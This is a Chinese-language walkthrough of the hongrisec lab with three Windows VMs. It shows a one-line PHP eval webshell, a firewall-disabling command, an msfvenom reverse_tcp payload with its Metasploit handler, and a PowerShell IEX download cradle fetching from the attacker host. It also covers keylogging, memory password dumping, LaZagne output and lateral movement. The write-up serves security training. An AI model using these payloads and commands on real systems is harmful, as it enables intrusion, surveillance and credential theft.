- 环境准备
- 搭建环境
- 配置靶机
- 配置win2008
- 配置win7
- 信息收集
- nmap信息收集
- 目录爆破
- 探测网站
- 探测phpmyadmin
- 探测beifen.rar
- 网站后台
- 渗透攻击
- getshell
- 收集系统信息
- 上传木马
- 反弹shell连接msf
- win7信息收集
- 添加路由
- 内网渗透
- 内网主机发现
- msf起代理
- 修改proxychains
- nmap内网主机发现
- 使用Cobalt Strike
- 设置监听器
- 生成Web Delivery
- 拿下主机
- 进入命令行
- 当前用户权限
- 文件管理
- 进程管理
- 屏幕截图
- 桌面控制
- 键盘记录
- 内网信息收集
- 端口扫描
- 漏洞扫描
- 域内信息收集
- 收集账号密码
- 直接从内存中导出系统密码
- 使用LaZagne查找本地存储的所有密码
- 使用域账号登录其他主机
- 建立隧道
- target
- 战果拓扑图
环境准备
1:下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
2:环境介绍:
共有三台机器,win7是对外的web机,win2003和win2008是内网机器
3:网络拓扑
搭建环境
1:三台机器都连接到vm1网卡
2:关闭vmware在vm1网卡上的DHCP功能
3:给win7添加一个网卡(win2003和win2008只有一块网卡),采用NAT
4:kali使用NAT
5:给以上机器拍摄快照
6:三台靶机全部开机
配置靶机
下面的配置操作建议做一下,不然实验的时候会很闹心。
三台靶机的默认密码是 hongrisec@2019
配置win2008
1:重设密码
登录win2008会被提示密码已经过期,需要重设密码,重设一个即可。注意,你是给liukaifeng01改了密码
2:不要手贱
开机之后会看到一个提示,要你重启计算机,不要答应它,选择稍后重启,然后就可以不用管它了
3:推荐设置管理员账号永不过期
配置win7
1:关于移除设备
有的人会习惯移除“打印机”、“声卡”、“CD/DVD(IDE)”诸类的设备,但是不要在win7上这样做,尤其是不能移除“打印机”,否则phpstudy会启动失败
2:不要手贱
开机之后会看到一个提示,要你重启计算机,不要答应它,选择稍后重启,然后就可以不用管它了
3:开启phpstudy
在文件目录:C:\phpStudyphpStudy.exe
4:检查一下ip
也许你的IP正常,但是我的机器出错了,在一块网卡使用VM1,一块网卡使用NAT的情况下,无法获取到NAT的地址。但是其他机器能正常获取NAT地址,方案可以参考vmware网卡排雷
此处解决办法如下,使用三块网卡,NAT能够正常使用了,但是桥接的网卡是192.254.124.253,不能用,正好符合实验环境:
5:确认web服务开启
输入win7对外IP可以看到phpStudy探针,说明正常。如果网络配置正常还无法正常访问,请试试设置防火墙规则,然后重启phpStudy
信息收集
nmap信息收集
看到目标开启了80、3306端口,那就先看看网站
登录网站,首先看到如下页面
存在如下问题:
http明文传输
服务器指纹泄露(系统、Apache、PHP版本)
phpinfo信息泄露
mysql数据库弱口令
mysql数据库口令爆破
phpstudy后门(待检测)
目录爆破
御剑走一波
探测网站
依次访问御剑爆出的一些目录:
探测phpmyadmin
使用弱密码root成功登录phpmyadmin,看到了一个名为newyxcms的表,(cms:内容管理系统)
存在如下问题:
外网可以访问phpmyadmin(默认情况下只能localhost访问)
基本可以确认网站使用的是yxcms,试试能不能访问,在“公告信息”中知道网站后台账密是admin:123456,地址是/index.php?r=admin
探测beifen.rar
确定了网站的版本是1.2.1,可以考虑找一找这个版本的漏洞,但是已经在“公告信息”里面看到了后台登录账密,就不费那心思了
网站后台
在“前台模板” 中看见自己可以编辑模板,模板通常可以自定义php文件,而如果可以自定义php文件直接就可以上一句话木马了
渗透攻击
getshell
1:写入一句话木马
<?php @eval($_REQUEST[777])?>
2:找到info.php所在路径
protected/apps/default/view
3:蚁剑连接
http://192.168.40.128/yxcms/protected/apps/default/view/default/info.php
编码设置使用默认的UTF8,有的内容会出现乱码,这里使用GBK编码
收集系统信息
关闭防火墙:netsh advfirewall set allprofiles state off
上传木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.3.139.50 lport=4444 -f exe -o re.exe
反弹shell连接msf
1:msf监听
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 10.3.139.50
run
2:启动木马
win7信息收集
当前达到的meterpreter来自win7
1:收集补丁信息
run post/windows/gather/enum_patches
2:安装的软件信息,发现有nmap,可以直接利用nmap对内网52网段进行扫描
run post/windows/gather/enum_applications
添加路由
添加路由:run autoroute -s 192.168.52.0 255.255.255.0
查看路由:run autoroute -p
内网渗透
内网主机发现
使用arp扫描,发现内网中共有三台主机
run post/windows/gather/arp_scanner rhosts=192.168.52.0/24
msf起代理
meterpreter > background 隐藏到后台
use auxiliary/server/socks5
show options
run
修改proxychains
sudo vim /etc/proxychains.conf
nmap内网主机发现
nmap扫描凉凉
不怕,还记得在msf收集信息的时候发现win7有nmap吗?使用蚁剑来做个扫描。
由于依然无法只用nmap做全面的主机发现,所以使用msf主机发现的结果来做扫描
使用Cobalt Strike
前面做的很不顺利,改用Cobalt Strike,使用cs的前提是需要获取到shell,即:当蚁剑拿到shell时就可以使用cs了
cs服务器在kali上面启动
sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456 &
cs客户机在kali上面启动
sudo chmod +x start.sh
./start.sh
重启kali依然登录cs被拒,今天真是太难了::>_<::
排雷补充:
启动cs服务器的时候,不让它在后台运行,即可
(不过我用另外一台kali把cs放后台可以正常使用)
因为种种原因第一次做的不大顺利,现在第二次做,下面的4个ip无需记忆,只是为了解释部分截图IP不一致的问题,重点在于理解操作上的逻辑
kali的IP(原本)192.168.40.147----->(现在)10.3.139.50
win7的IP(原本)192.168.40.128------->(现在)10.3.139.51
设置监听器
因为win7是web服务器,所以使用HTTP来建立连接,这意味着cs不能主动联系肉鸡,只能肉鸡来主动连接cs接收命令。默认情况下肉鸡会每隔60秒来cs服务端下载命令,在服务端执行完命令之后,会把命令的执行结果以HTTP的POST方式传到服务端。
(请把下面的ip当作是10.3.139.50)
生成Web Delivery
生成木马,文件或者命令
接下来它会生成一个powershell命令,如
#powershell 是Windows 系统自带组件
#无需上传文件到目标服务器磁盘
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.147:80/a'))"
拿下主机
蚁剑的虚拟终端执行命令,cs拿到上线主机
可以看到,肉鸡每隔60秒才会来连接服务器,做实验的话太慢了,调整一下时间,需要等60秒才能生效
【下面三级标题的内容是给我自己看的,读者可以忽略】
进入命令行
所有的图形化操作都可以在命令行里面显示,也可以直接在命令行里面写命令
当前用户权限
文件管理
beacon|右键|Explore|File Browser
进程管理
beacon|右键|Explore|Process List
屏幕截图
截屏
beacon|右键|Explore|Screenshots
查看截屏
View|Screenshots
桌面控制
beacon> desktop
键盘记录
键盘记录
beacon|右键|Explore|Process List|Log Keystrokes
查看键盘记录
View Keystrokes
如果记录键盘的话还是迁移一下注入的进程比较好,不要迁移到SYSTEM的进程里面去,因为SYSTEM是机器账户,不能登录系统,也自然不能记录它的键盘
内网信息收集
端口扫描
beacon|右键|Explore|Port Scan
扫的啥玩意啊,只发现了我自个
排查网络时发现,win7与其他机器网络不通了,解除问题之后再扫一遍
就这?还是nmap吧!cs下nmap正常发挥
漏洞扫描
扫描过程有点慢,耐心点,会拿到丰厚战果(考虑到前面使用msf拿win7并不号用,这里仅作扫描,不再联动msf)
对192.168.52.141扫描
beacon> shell nmap --script=vuln 192.168.52.141
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.141
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 17:57 ?D1ú±ê×?ê±??
[+] received output:
Nmap scan report for 192.168.52.141
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp open multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1030/tcp open iad1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6002/tcp open X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8099/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:70:62:5D (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 125.97 seconds
对192.168.52.138扫描
beacon> shell nmap --script=vuln 192.168.52.138
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.138
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 18:02 ?D1ú±ê×?ê±??
[+] received output:
Nmap scan report for 192.168.52.138
Host is up (0.00s latency).
Not shown: 982 filtered ports
PORT STATE SERVICE
53/tcp open domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp open kerberos-sec
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp open ldap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp open kpasswd5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp open http-rpc-epmap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp open ldapssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3268/tcp open globalcatLDAP
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3269/tcp open globalcatLDAPssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
49154/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49161/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49167/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:AA:F7:D1 (VMware)
Host script results:
| smb-double-pulsar-backdoor:
| VULNERABLE:
| Double Pulsar SMB Backdoor
| State: VULNERABLE
| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
| The Double Pulsar SMB backdoor was detected running on the remote machine.
|
| Disclosure date: 2017-04-14
| References:
| https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
| https://github.com/countercept/doublepulsar-detection-script
|_ https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 153.58 seconds
对192.168.52.143扫描:
beacon> shell nmap --script=vuln 192.168.52.143
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.143
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 18:08 ?D1ú±ê×?ê±??
[+] received output:
Nmap scan report for www.qiyuanxuetang.net (192.168.52.143)
Host is up (0.00s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.qiyuanxuetang.net
| Found the following possible CSRF vulnerabilities:
|
| Path: http://www.qiyuanxuetang.net:80/
| Form id:
| Form action: /l.php#bottom
|
| Path: http://www.qiyuanxuetang.net:80/l.php
| Form id:
|_ Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpinfo.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
| VULNERABLE:
| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
| State: VULNERABLE (Exploitable)
| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
| Extra information:
|
| Vulnerable files with proof of concept:
| http://www.qiyuanxuetang.net/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.qiyuanxuetang.net
| References:
| https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_ http://php.net/manual/en/reserved.variables.server.php
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-sql-injection:
| Possible sqli for queries:
| http://www.qiyuanxuetang.net:80/l.php?act=Function%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?act=Function%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?act=phpinfo%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| http://www.qiyuanxuetang.net:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
| Possible sqli for forms:
| Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
| funName
| Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
|_ funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1026/tcp open LSA-or-nterm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1027/tcp open IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1248/tcp open hermes
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-double-pulsar-backdoor:
| VULNERABLE:
| Double Pulsar SMB Backdoor
| State: VULNERABLE
| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
| The Double Pulsar SMB backdoor was detected running on the remote machine.
|
| Disclosure date: 2017-04-14
| References:
| https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
| https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_ https://github.com/countercept/doublepulsar-detection-script
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 138.36 seconds
域内信息收集
啥玩意啊,辣鸡
收集账号密码
直接从内存中导出系统密码
beacon> logonpasswords
使用LaZagne查找本地存储的所有密码
LaZagne的下载地址参考:https://github.com/AlessandroZ/LaZagne/releases/
使用蚁剑将exe文件上传到目标主机上再执行,这里可能还是机器的原因,all命令不好用,但是其他命令可以正常使用
C:\phpStudy> lazagne.exe all
C:\phpStudy> lazagne.exe browsers
|====================================================================|
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
|====================================================================|
[+] System masterkey decrypted for f22e410f-f947-4e08-8f2a-8f65df603f8d
[+] System masterkey decrypted for 1e582198-061f-43f1-abdf-d4e9b606b035
[+] System masterkey decrypted for bac7c6bc-5481-420b-b563-762266ca9865
########## User: Administrator ##########
------------------- Firefox passwords -----------------
[+] Password found !!!
URL: http://192.168.101.12:8080
Login: info@test.lab
Password: 123456789
########## User: liukaifeng01 ##########
------------------- Firefox passwords -----------------
[+] Password found !!!
URL: http://192.168.101.12:8080
Login: info@test.lab
Password: 123456789
[+] 2 passwords have been found.
For more information launch it again with the -v option
elapsed time = 8.12800002098
使用域账号登录其他主机
建立隧道
由于其他主机使用了VM1,所以使用SMB建立连接
target
前面已经拿到了系统密码,直接用域管理员的密码登录
相同的方法拿下内网中的机器138和141
战果拓扑图
行,就到此结束了。
